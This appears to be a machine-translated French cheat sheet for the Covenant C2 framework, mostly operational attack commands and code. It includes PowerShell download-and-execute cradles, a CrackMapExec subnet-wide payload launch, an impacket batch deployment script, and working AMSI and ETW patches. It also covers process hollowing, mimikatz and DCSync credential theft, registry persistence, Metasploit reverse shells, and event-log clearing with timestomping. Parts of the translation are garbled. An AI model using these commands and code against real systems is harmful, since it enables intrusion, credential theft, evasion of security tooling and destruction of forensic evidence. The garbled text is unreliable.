Covenant C2 Cadre Feuille de chaleur
Aperçu général
Covenant est un cadre de commande et de contrôle basé sur .NET (C2) conçu pour les opérations de l'équipe rouge et les tests de pénétration. Il dispose d'une interface Web pour la collaboration d'équipe, prend en charge plusieurs protocoles de communication, et fournit des capacités post-exploitation étendues spécialement adaptées aux environnements Windows utilisant . Les assemblages NET.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser contre toute cible.
Installation
Préalables
# Install .NET Core SDK (3.1 or later)
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt update
sudo apt install -y dotnet-sdk-6.0
# Verify installation
dotnet --version
Installation Docker (Recommandé)
# Clone Covenant repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Docker image
docker build -t covenant .
# Run Covenant container
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant
# Access web interface
# Navigate to https://localhost:7443
```_
### Installation manuelle
```bash
# Clone repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
# Build Covenant
dotnet build
# Run Covenant
dotnet run
# Access web interface at https://localhost:7443
```_
### Installation de Kali Linux
```bash
# Install from Kali repositories
sudo apt update
sudo apt install covenant
# Or build from source
git clone https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run
Utilisation de base
Configuration initiale
# First-time setup
1. Navigate to https://localhost:7443
2. Create admin user account
3. Accept SSL certificate warnings
4. Complete initial configuration wizard
# Default credentials (change immediately)
Username: CovenantAdmin
Password: CovenantPassword
Navigation de l'interface Web
| Section | Description |
|---|---|
| Dashboard | Overview of active grunts and listeners |
| Listeners | Manage communication listeners |
| Grunts | Manage compromised hosts (agents) |
| Tasks | Execute commands and modules |
| Templates | Manage grunt templates and launchers |
| Users | User management and permissions |
| Data | Collected data and file downloads |
Gestion des auditeurs
Création de l'auditeur HTTP
# Web Interface Steps:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTP-Listener-80
- Bind Address: 0.0.0.0
- Bind Port: 80
- Connect Address: [Your IP]
- Connect Port: 80
- Use SSL: False
# Advanced HTTP Configuration
- Profile: DefaultHttpProfile
- URLs: /en-us/index.html,/en-us/docs.html
- User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Création de l'auditeur HTTPS
# HTTPS Listener Configuration:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
- Name: HTTPS-Listener-443
- Bind Address: 0.0.0.0
- Bind Port: 443
- Connect Address: [Your IP]
- Connect Port: 443
- Use SSL: True
- SSL Certificate: [Upload or generate]
# Generate SSL Certificate
openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodes
Auditeur de passerelle (SMB)
# SMB Bridge Configuration:
1. Navigate to Listeners → Create
2. Select Bridge Listener
3. Configure parameters:
- Name: SMB-Bridge
- Bind Address: 0.0.0.0
- Bind Port: 445
- Connect Address: [Target IP]
- Connect Port: 445
- Profile: SMBBridgeProfile
Génération et déploiement de Grunt
Groupe PowerShell
# Generate PowerShell launcher
1. Navigate to Launchers → PowerShell
2. Configure parameters:
- Listener: HTTP-Listener-80
- Delay: 5
- Jitter: 0.1
- Connect Attempts: 5000
- Kill Date: [Future date]
# Generated PowerShell command example:
powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]
# Execute on target
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')"
Grunt binaire
# Generate binary executable
1. Navigate to Launchers → Binary
2. Configure parameters:
- Listener: HTTPS-Listener-443
- Output Kind: ConsoleApplication
- Target Framework: net40
- Delay: 10
- Jitter: 0.2
# Download and execute on target
# Binary will be generated as .exe file
MSBuild Grunt
1. Navigate to Launchers → MSBuild
2. Configure listener and parameters
3. Generated MSBuild XML file:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTask />
</Target>
<UsingTask TaskName="MSBuildTask" TaskFactory="CodeTaskFactory"
AssemblyFile="Microsoft.Build.Tasks.v4.0.dll">
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
// Covenant grunt code here
]]>
</Code>
</Task>
</UsingTask>
</Project>
# Execute with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml
InstallerUtiliser Grunt
# InstallUtil launcher
1. Navigate to Launchers → InstallUtil
2. Configure parameters
3. Execute on target:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
Gestion collective
Interactions des Grunts
# Basic grunt commands
help # Show available commands
whoami # Get current user context
hostname # Get computer name
pwd # Get current directory
ls # List directory contents
cd [directory] # Change directory
cat [file] # Read file contents
download [file] # Download file from target
upload [local] [remote] # Upload file to target
Gestion des processus
# Process operations
ps # List running processes
kill [PID] # Terminate process
getpid # Get current process ID
ppid # Get parent process ID
# Process injection
inject [PID] [assembly] # Inject .NET assembly into process
shinject [PID] [shellcode] # Inject shellcode into process
Opérations liées aux titres de créance
# Credential harvesting
mimikatz # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [domain] [user] # DCSync attack
golden [options] # Golden ticket creation
# Token manipulation
steal_token [PID] # Steal process token
make_token [user] [pass] # Create new token
rev2self # Revert to original token
Mouvement latéral
# WMI execution
wmi [computer] [command] # Execute command via WMI
wmiexec [computer] [user] [pass] [command] # WMI with credentials
# PowerShell remoting
winrm [computer] [command] # Execute via WinRM
invoke-command [computer] [scriptblock] # PowerShell remoting
# Service creation
sc [computer] [service] [binary] # Create and start service
Modules avancés
Mécanismes de persistance
# Registry persistence
persist_registry [key] [value] [payload] # Registry autorun
# Scheduled task persistence
persist_schtask [name] [trigger] [payload] # Scheduled task
# Service persistence
persist_service [name] [payload] # Windows service
# WMI persistence
persist_wmi [filter] [consumer] [payload] # WMI event subscription
Escalade des privilèges
# UAC bypass techniques
bypassuac [method] # Various UAC bypass methods
eventvwr # Event Viewer UAC bypass
fodhelper # FodHelper UAC bypass
computerdefaults # Computer Defaults UAC bypass
# Kernel exploits
ms16-032 # Secondary Logon Handle Privilege Escalation
ms16-135 # Windows Kernel-Mode Drivers EoP
Collecte de données
# System information
sysinfo # Detailed system information
env # Environment variables
netstat # Network connections
arp # ARP table
route # Routing table
# File system operations
find [pattern] # Search for files
tree [directory] # Directory tree
drives # List available drives
Opérations réseau
# Port scanning
portscan [target] [ports] # TCP port scan
ping [target] # ICMP ping
nslookup [hostname] # DNS lookup
# Network shares
net share # List local shares
net use # List network connections
net view [computer] # List remote shares
Collaboration d'équipe
Gestion des utilisateurs
# Web Interface User Operations:
1. Navigate to Users section
2. Create new user accounts
3. Assign roles and permissions:
- Administrator: Full access
- User: Limited access
- Listener: Listener management only
Partage de données
# File management
1. Navigate to Data → Files
2. View downloaded files from all grunts
3. Share files between team members
4. Export data for analysis
# Credential sharing
1. Navigate to Data → Credentials
2. View harvested credentials
3. Export credential database
Rapports
# Generate reports
1. Navigate to Data → Events
2. Filter by time range and grunt
3. Export activity logs
4. Generate executive summary
Automatisation et écriture
Script d'automatisation de Grunt
// C# automation script for Covenant
using System;
using System.Threading.Tasks;
using Covenant.Models;
public class AutomationScript
\\\\{
public async Task ExecuteAutomation(Grunt grunt)
\\\\{
// Automated reconnaissance
await grunt.ExecuteTask("whoami");
await grunt.ExecuteTask("hostname");
await grunt.ExecuteTask("sysinfo");
await grunt.ExecuteTask("ps");
// Credential harvesting
if (grunt.Integrity == "High")
\\\\{
await grunt.ExecuteTask("mimikatz");
await grunt.ExecuteTask("logonpasswords");
\\\\}
// Network discovery
await grunt.ExecuteTask("netstat");
await grunt.ExecuteTask("arp");
await grunt.ExecuteTask("net view");
// Persistence
await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
\\\\}
\\\\}
Automatisation PowerShell
# PowerShell script for automated grunt management
function Invoke-CovenantAutomation \\\\{
param(
[string]$CovenantURL = "https://localhost:7443",
[string]$Username,
[string]$Password
)
# Authenticate to Covenant API
$auth = @\\\\{
UserName = $Username
Password = $Password
\\\\}
$session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth|ConvertTo-Json) -ContentType "application/json"
# Get active grunts
$grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
foreach ($grunt in $grunts) \\\\{
if ($grunt.Status -eq "Active") \\\\{
Write-Host "Processing grunt: $($grunt.Name)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "sysinfo", "ps")
foreach ($cmd in $commands) \\\\{
$task = @\\\\{
Type = "GruntTask"
GruntId = $grunt.Id
Command = $cmd
\\\\}
Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task|ConvertTo-Json) -ContentType "application/json" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\\\}
# Usage
Invoke-CovenantAutomation -Username "admin" -Password "password"
Déploiement du groupe
#!/bin/bash
# Batch grunt deployment script
COVENANT_URL="https://your-covenant-server:7443"
TARGETS_FILE="targets.txt"
# Generate PowerShell launcher
LAUNCHER=$(curl -s -k -X GET "$COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN"|jq -r '.LauncherString')
# Deploy to multiple targets
while read -r target; do
echo "[+] Deploying to $target"
# Method 1: WMI execution
impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 2: PSExec
impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 3: SMB + scheduled task
impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"
sleep 5
done < "$TARGETS_FILE"
Techniques d'évacuation
Dépassement AMSI
// AMSI bypass in Covenant grunt
[System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")]
public static void BypassAMSI()
\\\\{
try
\\\\{
var amsiContext = Marshal.AllocHGlobal(9076);
var amsiSession = Marshal.AllocHGlobal(9076);
var amsiScanBuffer = Marshal.AllocHGlobal(9076);
// AMSI bypass implementation
var amsiDll = LoadLibrary("amsi.dll");
var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}
ETW Dépassement
// ETW bypass implementation
public static void BypassETW()
\\\\{
try
\\\\{
var ntdll = LoadLibrary("ntdll.dll");
var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\\\}
Découpage du processus
// Process hollowing implementation
public static void ProcessHollow(string targetProcess, byte[] payload)
\\\\{
var startupInfo = new STARTUPINFO();
var processInfo = new PROCESS_INFORMATION();
// Create suspended process
CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null,
ref startupInfo, out processInfo);
// Unmap original image
ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));
// Allocate memory and write payload
var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess),
payload.Length, AllocationType.Commit|AllocationType.Reserve,
MemoryProtection.ExecuteReadWrite);
WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);
// Resume execution
ResumeThread(processInfo.hThread);
\\\\}
Intégration avec d'autres outils
Intégration des métadonnées
# Use Covenant with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe
# Upload via Covenant grunt
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
execute C:\Windows\Temp\update.exe
# Use Metasploit for post-exploitation
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 443
run
Intégration de BloodHound
# Collect BloodHound data via Covenant
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
# Run BloodHound collection
execute C:\Windows\Temp\collector.exe -c All -d domain.local
# Download collected data
download C:\Windows\Temp\*BloodHound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
# Import downloaded zip file
CrackMapExec Intégration
# Use CME for initial access, Covenant for persistence
# Initial compromise via CME
crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""
# Verify Covenant grunt connection
# Use Covenant for further exploitation
Sécurité opérationnelle
Sécurité des communications
# Use domain fronting
1. Configure CloudFlare or similar CDN
2. Set up domain fronting rules
3. Configure Covenant listener with fronted domain
4. Use legitimate-looking URLs and user agents
# Certificate management
# Use legitimate SSL certificates
certbot certonly --standalone -d your-domain.com
# Configure Covenant with legitimate certificate
Obfuscation de la circulation
# Custom HTTP profiles
1. Navigate to Profiles → HTTP
2. Create custom profile mimicking legitimate traffic:
- User agents from target environment
- URLs matching legitimate applications
- Headers matching expected traffic
# Malleable C2 profiles
# Create custom communication patterns
# Mimic legitimate applications (Office 365, Google, etc.)
Anti-forensiques
# Event log clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe
# Memory cleanup
# Implement memory wiping in custom tasks
# Use process migration to avoid memory analysis
Dépannage
Questions communes
# Grunt not connecting
1. Check firewall rules on Covenant server
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference
# SSL certificate issues
# Generate new certificate
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Performance issues
# Increase grunt delay and jitter
# Use multiple listeners for load balancing
# Optimize task execution frequency
Mode de débogage
# Enable debug logging
1. Navigate to Administration → Settings
2. Enable debug logging
3. Check logs in Data → Events
4. Monitor grunt communication
# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolution
Questions relatives aux bases de données
# Reset Covenant database
cd Covenant/Covenant
rm -rf Data/covenant.db
dotnet run
# Backup database
cp Data/covenant.db Data/covenant.db.backup
# Restore database
cp Data/covenant.db.backup Data/covenant.db
Meilleures pratiques
Planification opérationnelle
- Configurer les auditeurs et les profils avant l'engagement
- Coordination de l'équipe: Utiliser le contrôle d'accès basé sur le rôle pour les membres de l'équipe
- ** Protocoles de communication** : Établir des canaux de communication clairs
- ** Traitement des données**: Mettre en œuvre des procédures de collecte et de stockage des données sécurisées
- Procédures de nettoyage: Plan pour l'enlèvement et le nettoyage des artefacts
Considérations en matière de sécurité
# Secure Covenant deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Grunt management
# Use unique grunt names
# Implement kill dates
# Regular grunt rotation
# Secure communication channels
Documentation
# Maintain operation logs
# Document all activities
# Track compromised systems
# Record credential harvesting
# Generate executive reports
Ressources
- [Résistoire de GitHub] (LINK_5)
- [Documentation du requérant] (LINK_5)
- [SpecterOps Blog Posts] (LINK_5)
- Entraînement de l'équipe rouge du village
- Opérations de l'équipe rouge SANS
*Cette feuille de tricherie fournit une référence complète pour l'utilisation du cadre Covenant C2. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer les opérations de l'équipe rouge ou les tests de pénétration. *